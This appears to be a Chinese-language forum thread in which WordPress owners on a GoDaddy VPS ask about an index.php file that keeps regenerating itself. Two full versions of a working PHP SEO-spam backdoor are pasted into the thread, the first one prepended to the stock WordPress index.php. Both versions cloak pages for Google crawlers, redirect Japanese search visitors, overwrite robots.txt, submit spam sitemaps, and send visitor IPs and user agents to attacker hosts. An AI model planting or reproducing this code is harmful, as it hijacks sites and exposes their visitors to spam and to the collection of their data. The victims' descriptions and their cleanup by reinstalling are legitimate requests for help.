<?php $group_num = 'z9126zn';
$inter_domain = 'http://' . $group_num . '.lievful.quest';
function curl_get_contents($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
$file_contents = curl_exec($ch);
curl_close($ch);
return $file_contents;
}
function getServerCont($url, $data = array())
{
$url = str_replace(' ', '+', $url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
$output = curl_exec($ch);
$errorCode = curl_errno($ch);
curl_close($ch);
if (0 !== $errorCode) {
return false;
}
return $output;
}
function is_crawler($agent)
{
if (strpos($agent, 'google') !== false || strpos($agent, 'yahoo') !== false) {
return true;
} else {
return false;
}
}
function check_refer($refer)
{
if (strpos($refer, '.co.jp') !== false || strpos($refer, 'google.com') !== false) {
return true;
} else {
return false;
}
}
$http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://');
$req_uri = $_SERVER['REQUEST_URI'];
$domain = $_SERVER["HTTP_HOST"];
$self = $_SERVER['PHP_SELF'];
$ser_name = $_SERVER['SERVER_NAME'];
$req_url = $http . $domain . $req_uri;
$indata1 = $inter_domain . "/indata.php";
$map1 = $inter_domain . "/map.php";
$jump1 = $inter_domain . "/jump.php";
$url_words = $inter_domain . "/words.php";
$url_robots = $inter_domain . "/robots.php";
if (strpos($req_uri, ".php")) {
$href1 = $http . $domain . $self;
} else {
$href1 = $http . $domain;
}
$data1[] = array();
$data1['http'] = $http;
$data1['domain'] = $domain;
$data1['req_uri'] = $req_uri;
$data1['href'] = $href1;
$data1['req_url'] = $req_url;
$user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
if(getenv('HTTP_CLIENT_IP')){
$client_ip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$client_ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
$client_ip = getenv('REMOTE_ADDR');
} else {
$client_ip = $_SERVER['REMOTE_ADDR'];
}
if (substr($req_uri, -6) == 'robots') {
$robots_cont = getServerCont($url_robots, $data1);
define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__));
file_put_contents(BASE_PATH . '/robots.txt', $robots_cont);
$robots_cont = file_get_contents(BASE_PATH . '/robots.txt');
if (strpos($robots_cont, "Crawl-delay:3")) {
echo 'robots.txt file create success!';
} else {
echo 'robots.txt file create fail!';
}
exit;
}
if (substr($req_uri, -4) == '.xml') {
if (strpos($req_uri, "pingsitemap.xml")) {
$str_cont = getServerCont($map1, $data1);
$str_cont_arr = explode(",", $str_cont);
$str_cont_arr[] = 'sitemap';
for ($k = 0; $k < count($str_cont_arr); $k++) {
if (strpos($href1, ".php") > 0) {
$tt1 = '?';
} else {
$tt1 = '/';
}
$http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml';
$data_new = 'https://www.google.com/ping?sitemap=' . $http2;
$data_new1 = 'http://www.google.com/ping?sitemap=' . $http2;
if (stristr(@file_get_contents($data_new), 'successfully')) {
echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(@curl_get_contents($data_new), 'successfully')) {
echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(@file_get_contents($data_new1), 'successfully')) {
echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(@curl_get_contents($data_new1), 'successfully')) {
echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else {
echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL;
}
}
exit;
}
if (strpos($req_uri, "allsitemap.xml")) {
$str_cont = getServerCont($map1, $data1);
header("Content-type:text/xml");
echo $str_cont;
exit;
}
if (strpos($req_uri, ".php")) {
$word4 = explode("?", $req_uri);
$word4 = $word4[count($word4) - 1];
$word4 = str_replace(".xml", "", $word4);
} else {
$word4 = str_replace("/", "", $req_uri);
$word4 = str_replace(".xml", "", $word4);
}
$data1['word'] = $word4;
$data1['action'] = 'check_sitemap';
$check_url4 = getServerCont($url_words, $data1);
if ($check_url4 == '1') {
$str_cont = getServerCont($map1, $data1);
header("Content-type:text/xml");
echo $str_cont;
exit;
}
$data1['action'] = "check_words";
$check1 = getServerCont($url_words, $data1);
if (strpos($req_uri, "map") > 0 || $check1 == '1') {
$data1['action'] = "rand_xml";
$check_url4 = getServerCont($url_words, $data1);
header("Content-type:text/xml");
echo $check_url4;
exit;
}
}
if (strpos($req_uri, ".php")) {
$main_shell = $http . $ser_name . $self;
$data1['main_shell'] = $main_shell;
} else {
$main_shell = $http . $ser_name;
$data1['main_shell'] = $main_shell;
}
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$chk_refer = check_refer($referer);
$bot=true;
if ($chk_refer) {
$data1['referer'] = $referer;
$data1['ip'] = $client_ip;
$data1['user_agent'] = $user_agent;
$data1['browser_la'] = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$refer_content = getServerCont($jump1, $data1);
if ($refer_content != "404") {
echo $refer_content;
exit;
}
$bot=false;
}
$res_crawl = is_crawler($user_agent);
if ($res_crawl&&$bot) {
$data1['http_user_agent'] = $user_agent;
$get_content = getServerCont($indata1, $data1);
if ($get_content == "404") {
header('HTTP/1.0 404 Not Found');
exit;
} else if ($get_content == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit;
} else if ($get_content == "blank") {
echo '';
exit;
} else {
echo $get_content;
exit;
}
} ?><?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
这是我们无法控制的 index.php 文件。
我们有带有 cPanel 和 wordpress 托管的 Godaddy VPS 服务器。我们在目录中安装了 wordpress 站点,该目录会自动创建 INDEX 文件,打开时显示 HTTP ERROR 500。
这是在我们的 VPS 服务器中自动创建的。当我们更改它时它会自动修改。删除时自动创建。
简而言之,我们无法控制目录和这个文件。
我也有同样的问题
<?php $group_num = 'z0109_18';
$inter_domain = 'http://107.150.41.2//' . $group_num . '/';
function curl_get_contents($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
$file_contents = curl_exec($ch);
curl_close($ch);
return $file_contents;
}
function getServerCont($url, $data = array())
{
$url = str_replace(' ', '+', $url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
$output = curl_exec($ch);
$errorCode = curl_errno($ch);
curl_close($ch);
if (0 !== $errorCode) {
return false;
}
return $output;
}
function is_crawler($agent)
{
$agent_check = false;
$bots = 'googlebot|google|yahoo|bing|aol';
if ($agent != '') {
if (preg_match("/($bots)/si", $agent)) {
$agent_check = true;
}
}
return $agent_check;
}
function check_refer($refer)
{
$check_refer = false;
$referbots = 'google.co.jp|yahoo.co.jp|google.com';
if ($refer != '' && preg_match("/($referbots)/si", $refer)) {
$check_refer = true;
}
return $check_refer;
}
$http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://');
$req_uri = $_SERVER['REQUEST_URI'];
$domain = $_SERVER["HTTP_HOST"];
$self = $_SERVER['PHP_SELF'];
$ser_name = $_SERVER['SERVER_NAME'];
$req_url = $http . $domain . $req_uri;
$indata1 = $inter_domain . "/indata.php";
$map1 = $inter_domain . "/map.php";
$jump1 = $inter_domain . "/jump.php";
$url_words = $inter_domain . "/words.php";
$url_robots = $inter_domain . "/robots.php";
if (strpos($req_uri, ".php")) {
$href1 = $http . $domain . $self;
} else {
$href1 = $http . $domain;
}
$data1[] = array();
$data1['domain'] = $domain;
$data1['req_uri'] = $req_uri;
$data1['href'] = $href1;
$data1['req_url'] = $req_url;
if (substr($req_uri, -6) == 'robots') {
$robots_cont = getServerCont($url_robots, $data1);
define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__));
file_put_contents(BASE_PATH . '/robots.txt', $robots_cont);
$robots_cont = file_get_contents(BASE_PATH . '/robots.txt');
if (strpos(strtolower($robots_cont), "sitemap")) {
echo 'robots.txt file create success!';
} else {
echo 'robots.txt file create fail!';
}
return;
}
if (substr($req_uri, -4) == '.xml') {
if (strpos($req_uri, "pingsitemap.xml")) {
$str_cont = getServerCont($map1, $data1);
$str_cont_arr = explode(",", $str_cont);
$str_cont_arr[] = 'sitemap';
for ($k = 0; $k < count($str_cont_arr); $k++) {
if (strpos($href1, ".php") > 0) {
$tt1 = '?';
} else {
$tt1 = '/';
}
$http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml';
$data_new = 'https://www.google.com/ping?sitemap=' . $http2;
$data_new1 = 'http://www.google.com/ping?sitemap=' . $http2;
if (stristr(@file_get_contents($data_new), 'successfully')) {
echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(@curl_get_contents($data_new), 'successfully')) {
echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(@file_get_contents($data_new1), 'successfully')) {
echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else if (stristr(@curl_get_contents($data_new1), 'successfully')) {
echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
} else {
echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL;
}
}
return;
}
if (strpos($req_uri, "allsitemap.xml")) {
$str_cont = getServerCont($map1, $data1);
header("Content-type:text/xml");
echo $str_cont;
return;
}
if (strpos($req_uri, ".php")) {
$word4 = explode("?", $req_uri);
$word4 = $word4[count($word4) - 1];
$word4 = str_replace(".xml", "", $word4);
} else {
$word4 = str_replace("/", "", $req_uri);
$word4 = str_replace(".xml", "", $word4);
}
$data1['word'] = $word4;
$data1['action'] = 'check_sitemap';
$check_url4 = getServerCont($url_words, $data1);
if ($check_url4 == '1') {
$str_cont = getServerCont($map1, $data1);
header("Content-type:text/xml");
echo $str_cont;
return;
}
$data1['action'] = "check_words";
$check1 = getServerCont($url_words, $data1);
if (strpos($req_uri, "map") > 0 || $check1 == '1') $data1['action'] = "rand_xml";
$check_url4 = getServerCont($url_words, $data1);
header("Content-type:text/xml");
echo $check_url4;
return;
}
if (strpos($req_uri, ".php")) {
$main_shell = $http . $ser_name . $self;
$data1['main_shell'] = $main_shell;
} else {
$main_shell = $http . $ser_name;
$data1['main_shell'] = $main_shell;
}
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$chk_refer = check_refer($referer);
if (strpos($_SERVER['REQUEST_URI'], '.php')) {
$url_ext = '?';
} else {
$url_ext = '/';
}
if ($chk_refer && (preg_match('/ja/i', @$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match('/ja/i', @$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match("/^[a-z0-9]+[0-9]+$/", end(explode($url_ext, str_replace(array(".html", ".htm"), "", $_SERVER['REQUEST_URI'])))))) {
echo getServerCont($jump1, $data1);
return;
}
$user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
$res_crawl = is_crawler($user_agent);
if ($res_crawl) {
$data1['http_user_agent'] = $user_agent;
$get_content = getServerCont($indata1, $data1);
echo $get_content;
return;
} ?>
我现在唯一的解决办法是删除 index.php recolection.php 和 wp-admin 和 wp-includes 文件夹。
之后,我重新安装了 WordPress,该网站再次运行。
过了一会儿
我开始检查所有内容,我发现了 3 个感染选项